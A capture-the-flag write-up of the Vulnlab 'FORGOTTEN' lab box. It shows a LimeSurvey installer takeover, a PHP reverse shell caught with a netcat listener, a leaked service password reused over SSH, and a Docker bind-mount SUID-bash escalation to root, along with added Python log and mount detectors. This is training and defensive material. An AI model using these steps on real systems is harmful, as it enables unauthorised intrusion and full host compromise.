FORGOTTEN-HTB Notes

FORGOTTEN-VL

Here are my notes on the FORGOTTEN box from Vulnlab, which was deployed to Hack The Box.

FORGOTTEN: 10.10.98.134

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 72215a992f4bae07c280dec482161e10 (ECDSA)
|_  256 a73d80fa9d931aa17e144620464df19e (ED25519)
80/tcp open  http    Apache httpd 2.4.56
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: 403 Forbidden



/survey - interesting.

http://10.10.98.134/survey/index.php?r=installer/welcome

The LimeSurvey installer is still reachable without authentication, which means the installation was never completed. Version: LimeSurvey 6.3.7.

Walking through the installer lets us pick the database and create the initial administrator account, so whoever finishes the install owns LimeSurvey admin.

The installer fails with a MySQL error because the target has no database of its own to connect to. So we stand up a MariaDB on the attacker box (10.8.0.71), point the installer at it, and let the installer create the admin user in our database.

https://insecure.ninja/posts/forgotten/

https://dan-feliciano.com/2024/06/05/forgotten/

Bash script to set up the attacker-side MariaDB (run on the attacker machine, not the target):

#!/bin/bash
# Stand up a MariaDB instance on the attacker box for the exposed LimeSurvey
# installer to connect to. Needs a user with sudo rights.

# Configuration
DB_NAME="limesurveydb"
DB_USER="limesurveyuser"
DB_PASSWORD="lime"
BIND_ADDRESS="0.0.0.0"   # Interface MariaDB listens on; use the VPN interface IP to avoid exposing it further
REMOTE_IP="%"            # Host allowed to connect; prefer the target IP (10.10.98.134) over '%' (any host)

# Abort with a message if the previous command failed
check_success() {
    if [ $? -ne 0 ]; then
        echo "Error during: $1" >&2
        exit 1
    fi
}

# Install MariaDB Server
echo "Installing MariaDB Server..."
sudo apt update && sudo apt install -y mariadb-server
check_success "MariaDB Server installation"

# Make MariaDB listen on the configured interface (the package default is 127.0.0.1 only)
echo "Configuring MariaDB bind-address..."
sudo sed -i "s/^bind-address.*/bind-address = $BIND_ADDRESS/" /etc/mysql/mariadb.conf.d/50-server.cnf
check_success "Updating bind-address"

# Restart to apply the new bind-address
echo "Restarting MariaDB service..."
sudo systemctl restart mariadb
check_success "MariaDB restart"

# Create the database and a user whose grants are limited to that database.
# IF NOT EXISTS makes the script safe to re-run.
echo "Creating MariaDB database and user..."
sudo mariadb -u root -e "
CREATE DATABASE IF NOT EXISTS $DB_NAME;
CREATE USER IF NOT EXISTS '$DB_USER'@'$REMOTE_IP' IDENTIFIED BY '$DB_PASSWORD';
GRANT SELECT, CREATE, INSERT, UPDATE, DELETE, ALTER, DROP, INDEX ON $DB_NAME.* TO '$DB_USER'@'$REMOTE_IP';
FLUSH PRIVILEGES;"
check_success "Database and user creation"

# Open TCP/3306 in ufw only if ufw is installed and active (otherwise this step is skipped)
if command -v ufw >/dev/null 2>&1 && sudo ufw status | grep -q '^Status: active'; then
    echo "Allowing TCP/3306 through ufw..."
    sudo ufw allow 3306/tcp
    check_success "Firewall configuration"
fi

echo "Installation and configuration completed successfully!"

In the installer's database step, enter the attacker IP as the database host, port 3306, and the name, user and password from the script; the installer then creates its tables in our database and lets us choose the admin credentials.


Admin account created through the installer: admin:admin

https://github.com/Y1LD1R1M-1337/Limesurvey-RCE

Authenticated RCE: a LimeSurvey administrator can upload plugins as ZIP archives through the plugin manager, and uploaded plugins land under the web root. The exploit above packages a PHP reverse shell (php-rev.php) as a plugin, uploads it with the admin credentials, and the shell is then reachable directly:

http://10.10.98.134/survey/upload/plugins/Y1LD1R1M/php-rev.php

sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.98.134] 46904
Linux efaa6f5097ed 6.2.0-1012-aws #12~22.04.1-Ubuntu SMP Thu Sep  7 14:01:24 UTC 2023 x86_64 GNU/Linux
 20:12:53 up  1:05,  0 users,  load average: 0.00, 0.02, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=2000(limesvc) gid=2000(limesvc) groups=2000(limesvc),27(sudo)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
limesvc
$ hostname
efaa6f5097ed


USER-SHELL ! 
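Both steps of the foothold leave distinctive traces in Apache's access log: installer routes answered with a non-error status (the install was never finalised), a POST to the admin plugin manager, and then a .php file being requested from under upload/. The following Python is an added example, not part of the original notes or of LimeSurvey; the log lines are constructed to mirror this box, and the admin/pluginmanager route name is an assumption (only the installer/welcome route appears in the notes).

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Apache combined log format: host ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample modelled on the FORGOTTEN box; not a real capture.
SAMPLE_LOG = """\
10.8.0.71 - - [02/Dec/2023:19:58:01 +0000] "GET /survey/index.php?r=installer/welcome HTTP/1.1" 200 4122 "-" "Mozilla/5.0"
10.8.0.71 - - [02/Dec/2023:19:59:10 +0000] "POST /survey/index.php?r=installer/database HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.8.0.71 - - [02/Dec/2023:20:05:44 +0000] "POST /survey/index.php?r=admin/pluginmanager&sa=upload HTTP/1.1" 302 0 "-" "python-requests/2.31"
10.8.0.71 - - [02/Dec/2023:20:12:53 +0000] "GET /survey/upload/plugins/Y1LD1R1M/php-rev.php HTTP/1.1" 200 0 "-" "python-requests/2.31"
10.10.10.5 - - [02/Dec/2023:20:13:02 +0000] "GET /survey/upload/surveys/123/files/logo.png HTTP/1.1" 200 8201 "-" "Mozilla/5.0"
10.10.10.5 - - [02/Dec/2023:20:13:05 +0000] "GET /survey/index.php?r=survey/index&sid=123 HTTP/1.1" 200 9921 "-" "Mozilla/5.0"
"""


def classify(line):
    """Return (tag, detail) for a suspicious request, or None for benign/unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(unquote(m.group("path")))
    status = int(m.group("status"))
    route = parse_qs(url.query).get("r", [""])[0]   # LimeSurvey's ?r=controller/action

    # 1. Installer reachable: any non-error answer means the install was never locked down.
    if route.startswith("installer/") and status < 400:
        return ("installer_reachable", route)
    # 2. Plugin upload via the admin plugin manager (route name assumed): rare, alert on it.
    if route.startswith("admin/pluginmanager") and m.group("method") == "POST":
        return ("plugin_upload", route)
    # 3. PHP served from the upload tree: should be impossible if upload/ has PHP execution disabled.
    if "/upload/" in url.path and url.path.lower().endswith((".php", ".phtml", ".phar")):
        return ("php_in_upload_dir", url.path)
    return None


def scan(log_text):
    """Group suspicious requests by source IP: {ip: [(tag, detail), ...]}."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        result = classify(line)
        if m and result:
            hits[m.group("ip")].append(result)
    return dict(hits)


if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG).items():
        for tag, detail in findings:
            print(f"{ip}\t{tag}\t{detail}")
```

Run against the sample, only 10.8.0.71 is flagged, with the four-stage sequence installer, installer, plugin upload, PHP under upload/. The third rule is also the one a hardening check would make permanent: serving upload/ with PHP execution disabled (and removing the installer after setup) closes both halves of this foothold.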


However, we are inside a Docker container (note the .dockerenv file in / and the random container hostname):

$ pwd
/
$ ls -lah
total 80K
drwxr-xr-x   1 root root 4.0K Dec  2  2023 .
drwxr-xr-x   1 root root 4.0K Dec  2  2023 ..
-rwxr-xr-x   1 root root    0 Dec  2  2023 .dockerenv
drwxr-xr-x   1 root root 4.0K Dec  2  2023 bin

[SNIP]

Docker escape (via credential reuse):

$ env
APACHE_CONFDIR=/etc/apache2
HOSTNAME=efaa6f5097ed

[SNIP]

APACHE_LOG_DIR=/var/log/apache2
LIMESURVEY_PASS=5W5HN4K4GCXf9E
PWD=/var/www/html

The LimeSurvey service password is sitting in the container's environment, readable by anyone who gets code execution there. Trying it for the limesvc account over SSH on the host works:

limesvc:5W5HN4K4GCXf9E

ssh limesvc@10.10.98.134

[SNIP]

limesvc@ip-10-10-200-233:~$ whoami
limesvc
limesvc@ip-10-10-200-233:~$ hostname
ip-10-10-200-233

python3 -c 'import pty; pty.spawn("/bin/bash")'

REGULAR USER SHELL on the host! (Not a true container escape: the same password is reused for the host account.)

limesvc@ip-10-10-200-233:~$ whoami
limesvc
limesvc@ip-10-10-200-233:~$ pwd
/home/limesvc
limesvc@ip-10-10-200-233:~$ cat user.txt
VL{REDIRECTED}

USER.TXT: VL{REDIRECTED}


PRIV ESC:

sudo -l: no entries for limesvc on the host.

Nothing useful in /etc/crontab, /etc/cron.* or /etc/cron.d.

No gcc.

Nothing usable among the SUID binaries.

Nothing usable in getcap output.

No applicable kernel exploits.

LINPEAS: 


[+] Checking if runc is available
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation
runc was found in /usr/sbin/runc, you may be able to escalate privileges with it

limesvc@ip-10-10-200-233:/opt/limesurvey/upload/plugins$ ls
Y1LD1R1M  index.html


/opt/limesurvey on the host appears to be the same directory as /var/www/html/survey inside the container (a bind mount): the Y1LD1R1M plugin directory uploaded through the container shows up here on the host.

Back in the container, upgrade the shell and try the LimeSurvey password with sudo (inside the container limesvc is in the sudo group, see the id output above):


$ pwd
/var/www/html/survey
$ script -qc /bin/bash /dev/null
limesvc@efaa6f5097ed:/var/www/html/survey$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for limesvc: 5W5HN4K4GCXf9E

Matching Defaults entries for limesvc on efaa6f5097ed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User limesvc may run the following commands on efaa6f5097ed:
    (ALL : ALL) ALL
limesvc@efaa6f5097ed:/var/www/html/survey$ sudo su


ROOT SHELL in Docker!

Now, as root inside the container, copy /bin/bash into the shared plugins directory and set the SUID bit on it. Because that directory is a bind mount, the host sees the very same file: owned by root (the container runs without user-namespace remapping, so container uid 0 is host uid 0) with its mode bits intact (the mount is not nosuid). Executing it on the host as limesvc with -p, so bash keeps the effective uid instead of dropping it, gives a root shell.

ROOT-DOCKER: 

root@efaa6f5097ed:/var/www/html/survey/upload/plugins# cp /bin/bash .
root@efaa6f5097ed:/var/www/html/survey/upload/plugins# ls
Y1LD1R1M  bash  index.html
root@efaa6f5097ed:/var/www/html/survey/upload/plugins# chmod u+s bash

HOST: 

limesvc@ip-10-10-200-233:/opt/limesurvey/upload/plugins$ ls
Y1LD1R1M  bash  index.html
limesvc@ip-10-10-200-233:/opt/limesurvey/upload/plugins$ ./bash -p
bash-5.1# whoami
root
bash-5.1# id
uid=2000(limesvc) gid=2000(limesvc) euid=0(root) groups=2000(limesvc)


ROOT-SHELL ! 

bash-5.1# cd /root
bash-5.1# ls
root.txt  snap
bash-5.1# cat root.txt
VL{REDIRECTED}

ROOT.TXT: VL{REDIRECTED}
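The host-side condition this abuses is a directory that is visible in both the container and the host, mounted rw without nosuid, and writable by a container root that is real uid 0. Two checks a practitioner would run, as an added example that is not part of the original notes: inside the container, pick out host-backed mounts that would honour a setuid bit; on the host, sweep the shared directory for setuid files. The /proc/self/mounts excerpt is constructed to resemble this box, and demo() uses a scratch directory standing in for /opt/limesurvey/upload/plugins.

```python
import os
import stat
import tempfile

# Constructed /proc/self/mounts excerpt as seen from inside the container; not a real capture.
SAMPLE_MOUNTS = """\
overlay / overlay rw,relatime,lowerdir=/l,upperdir=/u,workdir=/w 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev tmpfs rw,nosuid,size=65536k,mode=755 0 0
/dev/root /var/www/html/survey ext4 rw,relatime,discard 0 0
/dev/root /srv/data ext4 rw,nosuid,nodev,relatime 0 0
/dev/root /mnt/ro ext4 ro,relatime 0 0
"""

# Filesystem types that are backed by a host block device or network share (i.e. bind-mounted host
# paths); overlay, tmpfs and pseudo filesystems are skipped because they are not shared with the host.
REAL_FS = {"ext4", "ext3", "xfs", "btrfs", "zfs", "nfs", "nfs4"}


def writable_suid_capable_mounts(mounts_text):
    """From /proc/self/mounts text, return mount points on host-backed filesystems that are rw and
    lack nosuid: a setuid bit written there by container root is honoured by the host kernel."""
    risky = []
    for line in mounts_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        _src, mnt, fstype, opts = parts[:4]
        optset = set(opts.split(","))
        if fstype in REAL_FS and "rw" in optset and "nosuid" not in optset:
            risky.append(mnt.replace("\\040", " "))  # /proc escapes spaces in mount points as \040
    return risky


def find_setuid_files(root):
    """Walk root and return regular files carrying the setuid or setgid bit (what `chmod u+s` leaves)."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.append(p)
    return sorted(found)


def demo():
    """Reproduce the host-side finding in a scratch directory laid out like upload/plugins."""
    with tempfile.TemporaryDirectory() as d:
        os.makedirs(os.path.join(d, "Y1LD1R1M"))
        open(os.path.join(d, "index.html"), "w").close()
        planted = os.path.join(d, "bash")
        with open(planted, "wb") as f:
            f.write(b"#!/bin/sh\n")
        os.chmod(planted, 0o4755)  # -rwsr-xr-x, the mode `chmod u+s bash` produced in the writeup
        return [os.path.relpath(p, d) for p in find_setuid_files(d)]


if __name__ == "__main__":
    with open("/proc/self/mounts") as fh:
        for mnt in writable_suid_capable_mounts(fh.read()):
            print("rw, no nosuid, host-backed:", mnt)
    print("setuid files planted in scratch dir:", demo())
```

On the sample only /var/www/html/survey is flagged: /srv/data is protected by nosuid and /mnt/ro is read-only. Either fix on its own breaks the escalation step above: mount the shared path nosuid, or run the Docker daemon with userns-remap so that container root maps to an unprivileged host uid and the planted bash is no longer root-owned on the host.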

Service Info: Host: 172.17.0.2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

(Trailing line of the nmap output. 172.17.0.2 is an address on Docker's default bridge network, leaked through the Apache error page; in hindsight an early hint that the web service runs in a container.)